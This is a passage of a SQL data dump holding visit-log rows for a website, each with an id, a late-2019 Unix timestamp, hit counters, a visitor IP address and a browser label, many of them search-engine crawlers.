1574977824,1,1,0,0,'3.120.251.72','other'),(465033,1574978806,1,1,0,0,'8.29.198.27','other'),(465034,1574980115,1,1,0,0,'148.163.72.84','chrome'),(465035,1574980277,1,1,0,0,'213.180.203.44','other'),(465036,1574981201,1,1,0,0,'8.29.198.26','other'),(465037,1574981209,1,1,0,0,'148.163.123.67','chrome'),(465038,1574981646,1,1,0,0,'148.163.70.40','chrome'),(465039,1574982308,1,1,0,0,'5.58.21.230','opera'),(465040,1574982360,11,11,0,0,'8.209.79.9','chrome'),(465041,1574984994,1,1,0,0,'157.55.39.108','other'),(465042,1574985379,1,1,0,0,'66.249.64.28','chrome'),(465043,1574986494,1,1,0,0,'66.249.64.27','chrome'),(465044,1574986882,1,1,0,0,'91.209.11.236','other'),(465045,1574987248,1,1,0,0,'107.178.89.230','chrome'),(465046,1574987375,1,1,0,0,'157.55.39.106','other'),(465047,1574987891,1,1,0,0,'148.163.72.80','chrome'),(465048,1574987897,1,1,0,0,'66.249.64.26','chrome'),(465049,1574987908,1,1,0,0,'157.55.39.109','other'),(465050,1574988068,1,1,0,0,'107.178.75.6','chrome'),(465051,1574988288,1,1,0,0,'66.249.64.28','chrome'),(465052,1574988389,1,1,0,0,'66.249.64.27','chrome'),(465053,1574989217,1,1,0,0,'66.249.64.26','chrome'),(465054,1574989229,1,1,0,0,'148.163.70.216','chrome'),(465055,1574989499,1,1,0,0,'157.55.39.109','other'),(465056,1574989599,1,1,0,0,'148.163.70.245','chrome'),(465057,1574989616,1,1,0,0,'66.249.64.27','chrome'),(465058,1574989668,1,1,0,0,'8.29.198.26','other'),(465059,1574989670,2,2,0,0,'66.249.64.28','chrome'),(465060,1574990292,2,2,0,0,'66.249.64.26','chrome'),(465061,1574990341,1,1,0,0,'66.249.70.33','chrome'),(465062,1574990509,1,1,0,0,'148.163.72.228','chrome'),(465063,1574991032,1,1,0,0,'157.55.39.108','other'),(465064,1574991126,1,1,0,0,'157.55.39.109','other'),(465065,1574991340,1,1,0,0,'66.249.70.33','chrome'),(465066,1574991481,2,2,0,0,'66.249.64.27','chrome'),(465067,1574991756,1,1,0,0,'66.249.64.26','chrome'),(465068,1574991835,1,1,0,0,'107.189.168.10','chrome'),(465069,1574991968,1,1,0,0,'66.249.70.36','chrome'),(465070,1574992014,4,4,0,0,'66.249.64.28','chrome'),(465071,1574992117,1,1,0,0,'8.29.198.25','other'),(465072,1574992140,1,1,0,0,'213.180.203.44','other'),(465073,1574992426,1,1,0,0,'107.167.94.195','chrome'),(465074,1574992441,2,2,0,0,'207.46.13.32','other'),(465075,1574992817,1,1,0,0,'66.249.64.26','chrome'),(465076,1574993184,1,1,0,0,'66.249.70.33','chrome'),(465077,1574993680,1,1,0,0,'148.163.70.201','chrome'),(465078,1574993875,1,1,0,0,'66.249.64.27','chrome'),(465079,1574993963,1,1,0,0,'157.55.39.175','other'),(465080,1574994686,1,1,0,0,'66.249.64.30','chrome'),(465081,1574995669,2,2,0,0,'66.249.64.30','chrome'),(465082,1574995851,1,1,0,0,'107.178.93.36','chrome'),(465083,1574996727,1,1,0,0,'66.249.70.33','chrome'),(465084,1574996851,3,3,0,0,'66.249.64.26','chrome'),(465085,1574996900,1,1,0,0,'66.249.64.27','chrome'),(465086,1574997260,1,1,0,0,'37.188.11.183','chrome'),(465087,1574997569,1,1,0,0,'107.178.93.31','chrome'),(465088,1574997620,2,2,0,0,'66.249.70.36','chrome'),(465089,1574998345,1,1,0,0,'66.249.70.62','chrome'),(465090,1574998645,2,2,0,0,'66.249.64.28','chrome'),(465091,1574998670,4,4,0,0,'66.249.64.26','chrome'),(465092,1574998891,2,2,0,0,'66.249.64.27','chrome'),(465093,1574999744,1,1,0,0,'66.249.64.28','chrome'),(465094,1574999765,1,1,0,0,'66.249.70.62','chrome'),(465095,1575000000,1,1,0,0,'54.36.149.36','other'),(465096,1575000383,1,1,0,0,'107.178.75.11','chrome'),(465097,1575000523,1,1,0,0,'8.29.198.26','other'),(465098,1575001850,3,3,0,0,'66.249.64.26','chrome'),(465099,1575002062,1,1,0,0,'148.163.72.121','chrome'),(465100,1575002758,1,1,0,0,'66.249.64.27','chrome'),(465101,1575002965,1,1,0,0,'8.29.198.27','other'),(465102,1575003569,1,1,0,0,'66.249.64.26','chrome'),(465103,1575004235,1,1,0,0,'54.36.149.64','other'),(465104,1575004506,2,2,0,0,'66.249.64.26','chrome'),(465105,1575004559,1,1,0,0,'54.36.149.42','other'),(465106,1575005925,2,2,0,0,'66.249.64.26','chrome'),(465107,1575006393,1,1,0,0,'54.36.149.84','other'),(465108,1575006443,1,1,0,0,'141.8.142.164','other'),(465109,1575006614,1,1,0,0,'157.55.39.106','other'),(465110,1575006690,2,2,0,0,'66.249.64.28','chrome'),(465111,1575006782,1,1,0,0,'148.163.72.183','chrome'),(465112,1575008007,1,1,0,0,'66.249.64.27','chrome'),(465113,1575008600,1,1,0,0,'148.163.72.207','chrome'),(465114,1575008702,1,1,0,0,'66.249.64.28','chrome'),(465115,1575008870,1,1,0,0,'207.46.13.98','other'),(465116,1575009045,1,1,0,0,'91.196.178.78','chrome'),(465117,1575009050,1,1,0,0,'178.154.200.71','other'),(465118,1575010509,1,1,0,0,'66.249.64.28','chrome'),(465119,1575011385,1,1,0,0,'8.29.198.26','other'),(465120,1575012141,1,1,0,0,'95.134.189.48','chrome'),(465121,1575012340,1,1,0,0,'95.135.26.57','chrome'),(465122,1575012869,1,1,0,0,'66.249.64.27','chrome'),(465123,1575013098,1,1,0,0,'66.249.64.28','chrome'),(465124,1575013824,1,1,0,0,'8.29.198.25','other'),(465125,1575015114,1,1,0,0,'54.36.149.70','other'),(465126,1575015243,1,1,0,0,'37.9.113.39','other'),(465127,1575015264,1,1,0,0,'54.36.149.83','other'),(465128,1575015315,1,1,0,0,'141.8.183.33','other'),(465129,1575016532,2,2,0,0,'66.249.64.27','chrome'),(465130,1575016649,1,0,1,0,'66.249.64.28',''),(465131,1575016791,1,1,0,0,'157.55.39.106','other'),(465132,1575017373,1,1,0,0,'157.55.39.109','other'),(465133,1575017957,1,1,0,0,'91.196.178.85','chrome'),(465134,1575018214,2,2,0,0,'66.249.64.26','chrome'),(465135,1575018639,1,1,0,0,'66.249.64.27','chrome'),(465136,1575018742,1,1,0,0,'66.249.64.28','chrome'),(465137,1575019700,3,3,0,0,'66.249.64.27','chrome'),(465138,1575019858,1,1,0,0,'66.249.64.28','chrome'),(465139,1575020354,2,2,0,0,'66.249.64.26','chrome'),(465140,1575020511,1,1,0,0,'91.196.178.129','firefox'),(465141,1575020695,1,1,0,0,'66.249.64.27','chrome'),(465142,1575021167,1,1,0,0,'148.163.123.142','chrome'),(465143,1575021519,1,1,0,0,'66.249.64.26','chrome'),(465144,1575021805,1,1,0,0,'5.45.207.65','other'),(465145,1575022017,1,1,0,0,'18.222.219.54','chrome'),(465146,1575022241,1,1,0,0,'8.29.198.26','other'),(465147,1575022769,1,1,0,0,'157.55.39.158','other'),(465148,1575022918,2,2,0,0,'66.249.64.26','chrome'),(465149,1575022980,1,1,0,0,'54.36.149.2','other'),(465150,1575023014,1,1,0,0,'91.196.178.189','chrome'),(465151,1575023271,1,1,0,0,'66.249.64.27','chrome'),(465152,1575023313,1,1,0,0,'66.249.64.28','chrome'),(465153,1575024076,1,1,0,0,'91.196.178.189','chrome'),(465154,1575024080,1,1,0,0,'66.249.70.33','chrome'),(465155,1575024166,1,1,0,0,'66.249.64.26','chrome'),(465156,1575024277,1,1,0,0,'185.184.78.187','chrome'),(465157,1575024280,1,1,0,0,'185.39.148.29','firefox'),(465158,1575024311,1,1,0,0,'37.9.113.177','other'),(465159,1575024681,1,1,0,0,'8.29.198.25','other'),(465160,1575024743,1,1,0,0,'54.36.149.4','other'),(465161,1575024755,1,1,0,0,'91.196.178.161','chrome'),(465162,1575024890,1,1,0,0,'37.53.228.153','chrome'),(465163,1575025148,1,1,0,0,'91.196.178.85','chrome'),(465164,1575025474,1,1,0,0,'95.134.189.48','chrome'),(465165,1575025582,1,1,0,0,'66.249.70.36','chrome'),(465166,1575025996,1,1,0,0,'148.163.72.228','chrome'),(465167,1575026013,1,1,0,0,'141.8.188.39','other'),(465168,1575026240,1,1,0,0,'95.108.213.3','other'),(465169,1575026323,1,1,0,0,'109.74.154.72','chrome'),(465170,1575027209,2,2,0,0,'66.249.64.27','chrome'),(465171,1575027234,1,1,0,0,'66.249.64.26','chrome'),(465172,1575027619,1,1,0,0,'91.196.178.84','chrome'),(465173,1575028651,1,1,0,0,'148.163.70.167','chrome'),(465174,1575028676,1,1,0,0,'130.180.217.238','chrome'),(465175,1575028964,1,1,0,0,'213.108.45.138','chrome'),(465176,1575029057,1,1,0,0,'66.249.64.28','chrome'),(465177,1575029103,1,1,0,0,'66.249.64.26','chrome'),(465178,1575029535,1,1,0,0,'54.36.149.76','other'),(465179,1575029863,1,1,0,0,'54.36.149.58','other'),(465180,1575030235,3,3,0,0,'66.249.64.26','chrome'),(465181,1575030698,1,1,0,0,'66.249.70.36','chrome'),(465182,1575030835,1,1,0,0,'66.249.64.27','chrome'),(465183,1575030903,1,1,0,0,'148.163.72.80','chrome'),(465184,1575031638,1,1,0,0,'54.36.149.44','other'),(465185,1575031684,1,1,0,0,'107.178.75.8','chrome'),(465186,1575031832,1,1,0,0,'91.196.178.189','chrome'),(465187,1575032652,1,1,0,0,'54.36.149.65','other'),(465188,1575032683,1,1,0,0,'66.249.64.28','chrome'),(465189,1575032691,2,2,0,0,'66.249.64.27','chrome'),(465190,1575032995,1,1,0,0,'176.105.194.222','chrome'),(465191,1575033104,1,1,0,0,'8.29.198.26','other'),(465192,1575033402,1,1,0,0,'5.45.207.49','other'),(465193,1575034019,1,1,0,0,'66.249.64.26','chrome'),(465194,1575034421,1,1,0,0,'66.249.64.27','chrome'),(465195,1575034478,1,1,0,0,'107.178.89.230','chrome'),(465196,1575035139,1,1,0,0,'87.250.224.90','other'),(465197,1575035555,1,1,0,0,'8.29.198.27','other'),(465198,1575035709,1,1,0,0,'66.249.64.27','chrome'),(465199,1575036381,1,1,0,0,'141.8.132.28','other'),(465200,1575036472,1,1,0,0,'91.196.178.91','chrome'),(465201,1575036625,1,1,0,0,'66.249.64.26','chrome'),(465202,1575037063,1,1,0,0,'207.46.13.193','other'),(465203,1575037837,2,2,0,0,'66.249.64.28','chrome'),(465204,1575039452,1,1,0,0,'66.249.64.26','chrome'),(465205,1575039589,1,1,0,0,'66.249.70.33','chrome'),(465206,1575039739,1,1,0,0,'207.46.13.193','other'),(465207,1575042961,1,1,0,0,'66.249.64.26','chrome'),(465208,1575043211,1,1,0,0,'66.249.64.27','chrome'),(465209,1575044022,1,1,0,0,'8.29.198.26','other'),(465210,1575044050,1,1,0,0,'54.36.149.70','other'),(465211,1575044210,1,1,0,0,'66.249.70.62','chrome'),(465212,1575044443,1,1,0,0,'141.8.142.119','chrome'),(465213,1575044757,1,1,0,0,'54.36.149.59','other'),(465214,1575044851,1,1,0,0,'66.249.64.27','chrome'),(465215,1575045005,1,1,0,0,'66.249.64.28','chrome'),(465216,1575045097,5,5,0,0,'157.55.39.158','other'),(465217,1575046210,1,1,0,0,'54.36.149.105','other'),(465218,1575046280,1,1,0,0,'31.13.127.17','other'),(465219,1575046281,1,1,0,0,'31.13.127.2','other'),(465220,1575046404,1,1,0,0,'8.29.198.25','other'),(465221,1575046446,1,1,0,0,'54.36.149.47','other'),(465222,1575046752,1,1,0,0,'148.163.70.13','chrome'),(465223,1575046935,1,1,0,0,'148.163.123.125','chrome'),(465224,1575046961,1,1,0,0,'66.249.64.28','chrome'),(465225,1575047014,1,1,0,0,'209.17.97.50','other'),(465226,1575047019,3,3,0,0,'66.249.64.27','chrome'),(465227,1575047080,1,1,0,0,'207.46.13.193','other'),(465228,1575047168,1,1,0,0,'148.163.72.98','chrome'),(465229,1575048085,1,1,0,0,'141.8.142.119','other'),(465230,1575048253,1,1,0,0,'207.46.13.193','other'),(465231,1575048272,1,1,0,0,'66.249.64.28','chrome'),(465232,1575048840,1,1,0,0,'54.36.149.40','other'),(465233,1575048841,2,2,0,0,'157.55.39.158','other'),(465234,1575048984,1,1,0,0,'66.249.64.26','chrome'),(465235,1575049165,2,2,0,0,'207.46.13.193','other'),(465236,1575049766,1,1,0,0,'141.8.142.119','other'),(465237,1575050275,1,1,0,0,'54.36.149.46','other'),(465238,1575050866,2,2,0,0,'207.46.13.193','other'),(465239,1575051219,2,2,0,0,'66.249.70.33','chrome'),(465240,1575051282,1,1,0,0,'66.249.64.27','chrome'),(465241,1575051628,2,2,0,0,'66.249.64.28','chrome'),(465242,1575051695,1,1,0,0,'91.196.178.73','firefox'),(465243,1575051706,1,1,0,0,'66.249.64.26','chrome'),(465244,1575051803,1,1,0,0,'54.36.149.46','other'),(465245,1575051833,1,1,0,0,'157.55.39.158','other'),(465246,1575052448,1,1,0,0,'195.238.119.220','chrome'),(465247,1575052680,1,1,0,0,'141.8.188.39','other'),(465248,1575052756,1,1,0,0,'148.163.70.37','chrome'),(465249,1575052785,1,1,0,0,'66.249.70.33','chrome'),(465250,1575053670,1,1,0,0,'54.36.149.18','other'),(465251,1575053675,1,1,0,0,'66.249.64.27','chrome'),(465252,1575053734,1,1,0,0,'66.249.64.28','chrome'),(465253,1575053762,1,1,0,0,'157.55.39.158','other'),(465254,1575053796,1,1,0,0,'141.8.183.18','other'),(465255,1575054514,1,1,0,0,'148.163.72.62','chrome'),(465256,1575054891,1,1,0,0,'8.29.198.26','other'),(465257,1575055258,1,1,0,0,'141.8.142.119','other'),(465258,1575055636,1,1,0,0,'66.249.64.26','chrome'),(465259,1575055683,1,1,0,0,'157.55.39.158','other'),(465260,1575055702,1,1,0,0,'31.13.127.2','other'),(465261,1575055703,1,1,0,0,'31.13.127.16','other'),(465262,1575055778,2,2,0,0,'66.249.64.27','chrome'),(465263,1575056655,1,1,0,0,'148.163.123.125','chrome'),(465264,1575057077,2,2,0,0,'66.249.64.26','chrome'),(465265,1575057270,1,1,0,0,'8.29.198.26','other'),(465266,1575057400,1,1,0,0,'107.178.100.163','chrome'),(465267,1575057685,1,1,0,0,'107.178.89.230','chrome'),(465268,1575057921,2,2,0,0,'157.55.39.158','other'),(465269,1575058035,1,1,0,0,'66.249.64.27','chrome'),(465270,1575058308,1,1,0,0,'5.3.239.30','msie'),(465271,1575058326,1,1,0,0,'66.249.70.36','chrome'),(465272,1575058963,1,0,1,0,'66.249.70.62',''),(465273,1575059165,1,0,1,0,'66.249.64.28',''),(465274,1575059218,1,1,0,0,'148.163.72.49','chrome'),(465275,1575059239,1,1,0,0,'148.163.72.155','chrome'),(465276,1575059284,2,2,0,0,'66.249.64.26','chrome'),(465277,1575059686,1,1,0,0,'207.46.13.193','other'),(465278,1575059713,2,2,0,0,'66.249.64.27','chrome'),(465279,1575059776,1,1,0,0,'54.36.149.74','other'),(465280,1575060146,1,1,0,0,'54.36.149.61','other'),(465281,1575060227,1,1,0,0,'46.211.244.113','chrome'),(465282,1575060305,2,2,0,0,'157.55.39.158','other'),(465283,1575060412,1,1,0,0,'66.249.70.62','chrome'),(465284,1575060645,1,1,0,0,'141.8.132.12','other'),(465285,1575060895,1,1,0,0,'148.163.123.94','chrome'),(465286,1575061140,2,2,0,0,'54.36.149.68','other'),(465287,1575061523,1,1,0,0,'66.249.70.36','chrome'),(465288,1575061773,1,1,0,0,'66.249.64.27','chrome'),(465289,1575061796,1,1,0,0,'85.209.90.125','chrome'),(465290,1575061852,1,1,0,0,'66.249.64.26','chrome'),(465291,1575062263,1,1,0,0,'148.251.52.53','other'),(465292,1575062681,2,2,0,0,'207.46.13.233','other'),(465293,1575063171,2,2,0,0,'66.249.64.28','chrome'),(465294,1575063396,1,1,0,0,'66.249.64.26','chrome'),(465295,1575063534,1,1,0,0,'66.249.70.33','chrome'),(465296,1575064690,1,1,0,0,'107.167.92.82','chrome'),(465297,1575064994,1,1,0,0,'207.46.13.233','other'),(465298,1575065059,1,1,0,0,'213.180.203.44','other'),(465299,1575065217,1,1,0,0,'54.36.149.16','other'),(465300,1575065274,1,1,0,0,'66.249.64.26','chrome'),(465301,1575065776,1,1,0,0,'8.29.198.27','other'),(465302,1575065906,1,1,0,0,'46.211.143.13','chrome'),(465303,1575066235,1,1,0,0,'66.249.64.27','chrome'),(465304,1575066315,1,1,0,0,'148.163.70.218','chrome'),(465305,1575066529,1,1,0,0,'213.180.203.44','other'),(465306,1575067763,2,2,0,0,'66.249.64.28','chrome'),(465307,1575068115,1,1,0,0,'8.29.198.27','other'),(465308,1575068150,2,2,0,0,'66.249.64.26','chrome'),(465309,1575068770,1,1,0,0,'66.249.70.36','chrome'),(465310,1575069556,1,1,0,0,'54.36.149.107','other'),(465311,1575069628,3,3,0,0,'66.249.64.27','chrome'),(465312,1575069632,1,1,0,0,'66.249.64.26','chrome'),(465313,1575070005,1,1,0,0,'54.36.149.20','other'),(465314,1575070057,1,1,0,0,'213.180.203.44','other'),(465315,1575070335,1,1,0,0,'54.36.149.30','other'),(465316,1575070419,1,1,0,0,'66.249.64.28','chrome'),(465317,1575070635,1,1,0,0,'66.249.64.27','chrome'),(465318,1575070749,1,1,0,0,'54.36.149.4','other'),(465319,1575070993,1,1,0,0,'207.46.13.162','other'),(465320,1575071497,1,1,0,0,'66.249.70.36','chrome'),(465321,1575071571,1,1,0,0,'207.46.13.233','other'),(465322,1575071574,1,1,0,0,'148.163.123.144','chrome'),(465323,1575071896,3,3,0,0,'66.249.64.27','chrome'),(465324,1575071973,1,1,0,0,'107.167.89.201','chrome'),(465325,1575072375,1,1,0,0,'66.249.64.26','chrome'),(465326,1575072497,1,1,0,0,'107.178.89.152','chrome'),(465327,1575073104,2,2,0,0,'66.249.64.27','chrome'),(465328,1575073830,1,1,0,0,'13.66.139.0','other'),(465329,1575074044,3,3,0,0,'66.249.64.27','chrome'),(465330,1575074086,2,2,0,0,'66.249.64.26','chrome'),(465331,1575074711,1,1,0,0,'107.167.75.161','chrome'),(465332,1575074774,1,1,0,0,'148.163.70.115','chrome'),(465333,1575074902,3,3,0,0,'66.249.64.28','chrome'),(465334,1575074903,1,1,0,0,'13.66.139.0','other'),(465335,1575075089,3,3,0,0,'66.249.64.26','chrome'),(465336,1575075275,1,1,0,0,'213.180.203.44','other'),(465337,1575075838,2,2,0,0,'66.249.64.27','chrome'),(465338,1575076310,1,1,0,0,'207.46.13.162','other'),(465339,1575076463,1,1,0,0,'66.249.64.26','chrome'),(465340,1575076562,1,1,0,0,'148.163.70.223','chrome'),(465341,1575076625,1,1,0,0,'8.29.198.26','other'),(465342,1575076733,2,2,0,0,'66.249.64.28','chrome'),(465343,1575076817,2,2,0,0,'213.180.203.44','other'),(465344,1575077000,1,1,0,0,'66.249.70.33','chrome'),(465345,1575077195,3,3,0,0,'66.249.64.27','chrome'),(465346,1575077990,1,1,0,0,'66.249.64.26','chrome'),(465347,1575078194,2,2,0,0,'66.249.64.27','chrome'),(465348,1575078336,1,1,0,0,'54.36.149.37','other'),(465349,1575078378,3,3,0,0,'66.249.64.28','chrome'),(465350,1575078960,1,1,0,0,'8.29.198.25','other'),(465351,1575079139,1,1,0,0,'207.46.13.162','other'),(465352,1575079264,1,1,0,0,'46.42.130.249','msie'),(465353,1575079272,1,1,0,0,'94.180.131.65','msie'),(465354,1575079461,1,1,0,0,'107.178.89.148','chrome'),(465355,1575080151,1,1,0,0,'66.249.64.27','chrome'),(465356,1575081179,1,1,0,0,'66.249.64.28','chrome'),(465357,1575081371,1,1,0,0,'66.249.70.33','chrome'),(465358,1575082171,1,1,0,0,'54.36.149.3','other'),(465359,1575082224,1,1,0,0,'66.249.64.28','chrome'),(465360,1575082763,1,1,0,0,'107.189.160.132','chrome'),(465361,1575083190,1,1,0,0,'213.180.203.37','other'),(465362,1575083282,1,1,0,0,'66.249.64.26','chrome'),(465363,1575083545,2,2,0,0,'207.46.13.162','other'),(465364,1575083860,1,1,0,0,'66.249.70.33','chrome'),(465365,1575084079,1,1,0,0,'107.178.89.188','chrome'),(465366,1575084189,1,1,0,0,'66.249.70.62','chrome'),(465367,1575084273,1,1,0,0,'91.209.11.236','other'),(465368,1575084291,1,1,0,0,'207.46.13.10','other'),(465369,1575084481,1,1,0,0,'213.180.203.44','other'),(465370,1575084651,1,1,0,0,'213.180.203.37','other'),(465371,1575085067,1,1,0,0,'54.36.149.24','other'),(465372,1575085563,1,1,0,0,'66.249.64.27','chrome'),(465373,1575085628,1,1,0,0,'54.36.149.3','other'),(465374,1575086099,2,2,0,0,'66.249.64.28','chrome'),(465375,1575086124,2,2,0,0,'66.249.64.26','chrome'),(465376,1575086432,1,1,0,0,'66.249.70.36','chrome'),(465377,1575086616,1,1,0,0,'66.249.64.27','chrome'),(465378,1575087151,1,1,0,0,'213.180.203.44','other'),(465379,1575087475,1,1,0,0,'107.167.89.201','chrome'),(465380,1575087477,1,1,0,0,'8.29.198.25','other'),(465381,1575087954,1,1,0,0,'94.153.105.148','chrome'),(465382,1575087985,2,2,0,0,'66.249.64.27','chrome'),(465383,1575089063,3,3,0,0,'213.180.203.44','other'),(465384,1575089498,1,1,0,0,'213.180.203.37','other'),(465385,1575089806,1,1,0,0,'8.29.198.27','other'),(465386,1575090891,1,1,0,0,'107.178.93.36','chrome'),(465387,1575091017,1,1,0,0,'213.180.203.44','other'),(465388,1575092340,1,1,0,0,'87.250.224.90','other'),(465389,1575092372,1,1,0,0,'5.45.207.49','other'),(465390,1575092473,1,1,0,0,'66.249.64.28','chrome'),(465391,1575093008,1,1,0,0,'207.46.13.149','other'),(465392,1575093833,1,1,0,0,'107.178.75.6','chrome'),(465393,1575094972,1,1,0,0,'148.163.72.16','chrome'),(465394,1575095053,1,1,0,0,'66.249.64.26','chrome'),(465395,1575095089,1,1,0,0,'148.163.72.236','chrome'),(465396,1575096040,1,1,0,0,'109.126.246.141','chrome'),(465397,1575096425,1,1,0,0,'66.249.70.36','chrome'),(465398,1575096477,1,1,0,0,'66.249.70.33','chrome'),(465399,1575096893,1,1,0,0,'66.249.70.62','chrome'),(465400,1575097159,2,2,0,0,'66.249.64.27','chrome'),(465401,1575097490,1,1,0,0,'107.178.112.176','chrome'),(465402,1575097819,1,1,0,0,'148.163.123.23','chrome'),(465403,1575097826,2,2,0,0,'66.249.64.28','chrome'),(465404,1575098084,2,2,0,0,'213.202.253.44','other'),(465405,1575098328,1,1,0,0,'8.29.198.26','other'),(465406,1575098796,1,1,0,0,'107.167.75.161','chrome'),(465407,1575099101,1,1,0,0,'207.46.13.149','other'),(465408,1575099539,1,1,0,0,'31.13.127.24','other'),(465409,1575099540,1,1,0,0,'31.13.127.23','other'),(465410,1575100658,1,1,0,0,'8.29.198.27','other'),(465411,1575100955,1,1,0,0,'141.8.132.37','other'),(465412,1575101959,1,1,0,0,'66.249.64.26','chrome'),(465413,1575102292,1,1,0,0,'207.46.13.28','other'),(465414,1575102298,1,1,0,0,'157.55.39.66','other'),(465415,1575102303,2,2,0,0,'207.46.13.190','other'),(465416,1575102315,2,2,0,0,'207.46.13.149','other'),(465417,1575102578,1,0,1,0,'66.249.64.27',''),(465418,1575102820,2,1,1,0,'66.249.64.28',''),(465419,1575103103,1,0,1,0,'66.249.64.26',''),(465420,1575103466,1,1,0,0,'207.46.13.149','other'),(465421,1575103808,1,1,0,0,'66.249.64.26','chrome'),(465422,1575104546,2,2,0,0,'207.46.13.149','other'),(465423,1575104578,1,1,0,0,'157.55.39.66','other'),(465424,1575105177,1,1,0,0,'66.249.93.217','chrome'),(465425,1575105295,1,1,0,0,'207.46.13.28','other'),(465426,1575105959,1,1,0,0,'185.15.56.22','other'),(465427,1575106139,1,1,0,0,'66.249.64.27','chrome'),(465428,1575106276,1,1,0,0,'66.249.64.26','chrome'),(465429,1575106381,2,2,0,0,'207.46.13.190','other'),(465430,1575106781,2,2,0,0,'207.46.13.149','other'),(465431,1575106976,2,2,0,0,'95.211.209.246','chrome'),(465432,1575106990,1,1,0,0,'66.249.93.216','chrome'),(465433,1575106995,1,1,0,0,'128.30.52.96','other'),(465434,1575107341,1,1,0,0,'207.46.13.28','other'),(465435,1575107884,2,2,0,0,'207.46.13.149','other'),(465436,1575108112,1,1,0,0,'66.249.70.36','chrome'),(465437,1575108275,1,1,0,0,'207.46.13.28','other'),(465438,1575108311,3,3,0,0,'66.249.64.26','chrome'),(465439,1575108700,1,1,0,0,'157.55.39.66','other'),(465440,1575109183,1,1,0,0,'8.29.198.26','other'),(465441,1575109933,1,1,0,0,'207.46.13.149','other'),(465442,1575110801,1,1,0,0,'66.249.70.62','chrome'),(465443,1575111197,1,1,0,0,'37.9.113.6','other'),(465444,1575111421,1,1,0,0,'66.249.64.27','chrome'),(465445,1575111504,1,1,0,0,'8.29.198.26','other'),(465446,1575111945,1,1,0,0,'66.249.64.28','chrome'),(465447,1575111996,1,1,0,0,'207.46.13.190','other'),(465448,1575112611,1,1,0,0,'66.249.70.33','chrome'),(465449,1575112671,1,1,0,0,'109.74.154.72','chrome'),(465450,1575113221,1,1,0,0,'66.249.64.27','chrome'),(465451,1575113691,1,1,0,0,'148.163.70.218','chrome'),(465452,1575113918,1,1,0,0,'46.211.138.132','chrome'),(465453,1575114420,1,1,0,0,'207.46.13.190','other'),(465454,1575114431,2,2,0,0,'157.55.39.66','other'),(465455,1575115370,1,1,0,0,'37.9.113.6','other'),(465456,1575115463,1,1,0,0,'207.46.13.190','other'),(465457,1575115468,1,1,0,0,'207.46.13.28','other'),(465458,1575115603,3,3,0,0,'157.55.39.66','other'),(465459,1575115605,2,2,0,0,'66.249.64.27','chrome'),(465460,1575116377,1,1,0,0,'207.46.13.28','other'),(465461,1575116568,1,1,0,0,'107.178.93.95','chrome'),(465462,1575116608,1,1,0,0,'66.249.70.33','chrome'),(465463,1575116613,1,1,0,0,'148.163.70.87','chrome'),(465464,1575116770,2,2,0,0,'66.249.64.27','chrome'),(465465,1575116840,2,2,0,0,'66.249.64.26','chrome'),(465466,1575117061,1,1,0,0,'66.249.64.28','chrome'),(465467,1575117360,1,1,0,0,'66.249.70.62','chrome'),(465468,1575117513,2,2,0,0,'158.69.243.99','other'),(465469,1575117925,1,1,0,0,'107.178.75.60','chrome'),(465470,1575118014,1,1,0,0,'66.249.70.33','chrome'),(465471,1575118144,3,3,0,0,'66.249.64.28','chrome'),(465472,1575118272,1,1,0,0,'51.68.152.26','chrome'),(465473,1575118306,1,1,0,0,'141.8.142.115','other'),(465474,1575118406,4,4,0,0,'66.249.64.26','chrome'),(465475,1575118451,3,3,0,0,'66.249.64.27','chrome'),(465476,1575118635,1,1,0,0,'207.46.13.190','other'),(465477,1575119554,1,1,0,0,'91.196.178.175','chrome'),(465478,1575119935,1,1,0,0,'207.46.13.28','other'),(465479,1575120045,1,1,0,0,'8.29.198.26','other'),(465480,1575120400,3,3,0,0,'66.249.64.26','chrome'),(465481,1575120572,1,1,0,0,'141.8.188.66','other'),(465482,1575120926,1,1,0,0,'141.8.132.12','other'),(465483,1575121265,1,1,0,0,'207.46.13.190','other'),(465484,1575121707,2,2,0,0,'66.249.64.26','chrome'),(465485,1575121860,1,1,0,0,'5.44.42.209','chrome'),(465486,1575121863,1,1,0,0,'81.177.157.252','firefox'),(465487,1575121939,1,1,0,0,'68.183.147.132','other'),(465488,1575122357,1,1,0,0,'8.29.198.27','other'),(465489,1575122614,2,2,0,0,'66.249.64.26','chrome'),(465490,1575122733,1,1,0,0,'193.106.30.99','firefox'),(465491,1575122785,2,2,0,0,'66.249.64.27','chrome'),(465492,1575123229,1,1,0,0,'91.237.241.62','firefox'),(465493,1575123630,1,1,0,0,'66.249.64.26','chrome'),(465494,1575124058,1,1,0,0,'46.211.147.192','chrome'),(465495,1575124395,3,3,0,0,'66.249.64.27','chrome'),(465496,1575125136,1,1,0,0,'157.55.39.66','other'),(465497,1575125453,2,2,0,0,'66.249.64.26','chrome'),(465498,1575125549,2,2,0,0,'66.249.64.27','chrome'),(465499,1575125932,1,1,0,0,'66.249.64.28','chrome'),(465500,1575126402,1,1,0,0,'66.249.64.26','chrome'),(465501,1575126576,1,1,0,0,'157.55.39.179','other'),(465502,1575127336,3,3,0,0,'35.188.9.251','chrome'),(465503,1575127384,1,1,0,0,'148.163.70.37','chrome'),(465504,1575127519,3,3,0,0,'35.184.60.14','chrome'),(465505,1575127555,5,5,0,0,'35.226.22.16','chrome'),(465506,1575127576,2,2,0,0,'35.192.214.254','chrome'),(465508,1575127586,2,2,0,0,'34.67.119.150','chrome'),(465510,1575127589,1,1,0,0,'91.196.178.175','chrome'),(465511,1575127634,1,1,0,0,'66.249.70.33','chrome'),(465512,1575127639,1,1,0,0,'66.249.64.27','chrome'),(465513,1575127944,3,3,0,0,'185.14.31.68','chrome'),(465514,1575128017,1,1,0,0,'157.55.39.179','other'),(465515,1575128404,2,2,0,0,'66.249.64.26','chrome'),(465516,1575128508,2,2,0,0,'207.46.13.28','other'),(465517,1575128922,1,1,0,0,'148.163.123.144','chrome'),(465518,1575129029,1,1,0,0,'148.163.72.121','chrome'),(465519,1575129578,3,3,0,0,'66.249.64.27','chrome'),(465520,1575129758,1,1,0,0,'66.249.64.28','chrome'),(465521,1575129945,2,2,0,0,'66.249.64.26','chrome'),(465522,1575129969,1,1,0,0,'107.167.92.82','chrome'),(465523,1575129990,1,1,0,0,'148.163.72.228','chrome'),(465524,1575130064,1,1,0,0,'157.55.39.179','other'),(465525,1575130915,1,1,0,0,'8.29.198.25','other'),(465526,1575131807,1,1,0,0,'107.178.75.8','chrome'),(465527,1575132226,1,1,0,0,'66.249.70.62','chrome'),(465528,1575132292,1,1,0,0,'66.249.64.27','chrome'),(465529,1575132313,1,1,0,0,'157.55.39.179','other'),(465530,1575132326,1,1,0,0,'66.249.